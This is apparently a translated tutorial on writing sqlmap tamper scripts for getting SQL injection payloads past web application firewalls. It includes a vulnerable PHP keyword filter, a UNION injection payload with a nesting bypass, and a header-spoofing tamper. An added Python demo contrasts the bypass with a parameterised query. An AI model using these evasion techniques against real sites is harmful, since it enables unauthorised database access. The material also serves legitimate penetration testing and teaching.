Note: I recently ran into some unusual WAFs and wanted to write my own tamper scripts, but found no reference material to use, so I wrote this article to make writing custom tampers easier. The author's ability is limited; if there are mistakes, readers are asked to correct them.
0x00 Sqlmap Tamper Introduction
sqlmap is an automated SQL injection tool, and tamper scripts are a set of scripts that extend it; their main job is to make specific modifications to the original payload in order to get past a WAF.
0x01 A minimal example
To illustrate the structure of a tamper script, let's start with one of the simplest examples:
# sqlmap/tamper/escapequotes.py
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    # Escape single and double quotes with a backslash
    return payload.replace("'", "\\'").replace('"', '\\"')
It is not hard to see that a minimal tamper script consists of the __priority__ variable and the dependencies and tamper functions.
__priority__ defines the script's precedence when several tamper scripts are used together.
The dependencies function declares the environments the script applies to (or does not apply to); it may be empty.
tamper is the main function; it accepts the parameters payload and **kwargs.
The return value is the modified payload. In this example, single quotes are replaced with \' and double quotes with \".
0x02 Detailed introduction
The first section covered the simplest tamper structure; below we introduce it in more detail.
tamper function
tamper is the body of the whole script and is mainly used to modify the original payload.
For a simple example, suppose the server has the following lines of code:
$id = str_ireplace('union', '', $_POST['id']);
$sql = "SELECT * FROM users WHERE id = '$id'";
and our payload is
-8363' Union SELECT null---
Because 'union' is filtered out, the payload will not execute properly, so you can write this tamper:
def tamper(payload, **kwargs):
    # Nest the keyword so that a single removal of 'union' leaves 'union' behind
    return payload.replace("Union", "uniounionn")
Save it as test.py in sqlmap/tamper/ and run sqlmap with --tamper=test to get past the filter rule.
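As an added example (not from the original article or from sqlmap), the following Python reproduces the single-pass keyword filter shown above, shows why a keyword blacklist is not a defence (one removal of "union" recreates the keyword), and contrasts it with a parameterised query that treats the same tampered input as plain data. The users table and its row are constructed for the demo.

```python
import sqlite3

# Python re-implementation of the server-side filter from the PHP snippet above:
# single-pass, case-insensitive removal of the first "union" occurrence.
def strip_union_once(value: str) -> str:
    lowered = value.lower()
    idx = lowered.find("union")
    if idx == -1:
        return value
    return value[:idx] + value[idx + len("union"):]

# The tamper from the article: nest the keyword so one removal recreates it.
def tamper(payload, **kwargs):
    return payload.replace("Union", "uniounionn")

def keyword_survives_filter(payload: str) -> bool:
    """True if 'union' is still present after the filter has run once."""
    return "union" in strip_union_once(tamper(payload)).lower()

def run_parameterized(user_input: str):
    """The same lookup done correctly: the value is bound as a parameter, never
    concatenated into SQL, so the filter's behaviour no longer matters."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.execute("INSERT INTO users VALUES ('1', 'alice')")  # constructed sample row
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchall()
    conn.close()
    return rows

if __name__ == "__main__":
    payload = "-8363' Union SELECT null---"
    print(strip_union_once(payload))           # plain keyword is stripped
    print(strip_union_once(tamper(payload)))   # nested keyword survives intact
    print(run_parameterized(tamper(payload)))  # [] : whole string treated as an id value
```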
dependencies function
The dependencies function declares the environments the tamper script supports or does not support. A simple example:
# sqlmap/tamper/charunicodeencode.py
import os
from lib.core.common import singleTimeWarnMessage

def dependencies():
    # singleTimeWarnMessage() prints a warning message to the console once
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0])
kwargs
Among the 47 official tamper scripts, the kwargs parameter is used only twice, and both times only to change an HTTP header. Here is one example as a simple explanation:
# sqlmap/tamper/varnish.py
def tamper(payload, **kwargs):
    # kwargs carries the request headers; add or overwrite one in place
    headers = kwargs.get("headers", {})
    headers["X-originating-IP"] = "127.0.0.1"
    return payload
This script changes the X-originating-IP header to get past the WAF; the other use of kwargs is in xforwardedfor.py, which also changes a header for the same purpose.
0x03 Conclusion
There is far more to writing tamper scripts than this; this article only discusses their most basic structure. Since a tamper is an extension of sqlmap, almost all of sqlmap's built-in functions and variables can be used when writing one, which this article does not list.
0x04 Some commonly used values
# sqlmap/lib/core/enums.py
class PRIORITY:
    LOWEST = -100
    LOWER = -50
    LOW = -10
    NORMAL = 0
    HIGH = 10
    HIGHER = 50
    HIGHEST = 100

class DBMS:
    ACCESS = "Microsoft Access"
    DB2 = "IBM DB2"
    FIREBIRD = "Firebird"
    MAXDB = "SAP MaxDB"
    MSSQL = "Microsoft SQL Server"
    MYSQL = "MySQL"
    ORACLE = "Oracle"
    PGSQL = "PostgreSQL"
    SQLITE = "SQLite"
    SYBASE = "Sybase"
    HSQLDB = "HSQLDB"